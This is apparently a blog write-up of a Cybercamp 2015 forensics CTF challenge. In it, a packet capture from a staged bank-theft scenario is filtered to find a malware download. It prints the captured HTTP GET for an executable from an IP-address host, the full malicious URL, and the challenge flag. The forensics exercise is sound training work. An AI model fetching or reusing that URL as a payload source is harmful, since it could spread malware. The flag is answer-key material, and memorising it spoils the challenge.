English [Cybercamp 2015] [Forense 2.4] Write Up

Description

The company of Mr. Garcia has been robbed of 74,300€ from his bank account. The theft was committed without the knowledge of Mr. García or people in charge of IT.

Some of the money has been retrieved thanks to the speed of the bank to block the target account, but Mr. Garcia is determined to know how this unfortunate incident occurred, as he invested in forming security technicians and purchasing a perimeter antivirus solution for workstations.

After the incident, we have been asked to do a forensic analysis of the machine, but unfortunately these devices have been handled incorrectly and have no value for our review. Fortunately the system administrator, before the network failure, (do not know if caused by the incident) got a file with network traffic of the same day as the theft of bank accounts.

Download

Question: What is the malicious URL where the malware is downloaded?

Resolution

As seen in Forense 2.1, there’s a dialog between a local host and the hacker.
We have filtered the traffic on HTTP packets (it seems to be a reverse connect to the attacker).
There’s a HTTP GET on packet #78 :
GET /static/bootstrap/css/sp.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Accept-Language: es
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: 167.160.169.66:8080
Connection: Keep-Alive

SHA256(http://167.160.169.66:8080/static/bootstrap/css/sp.exe) : 8075987cd7355f3f1e9e9b27348c257bbc04a7447ddaaa514390a89dc79b89d4

Flag is 8075987cd7355f3f1e9e9b27348c257bbc04a7447ddaaa514390a89dc79b89d4

Leave a Reply

Your email address will not be published.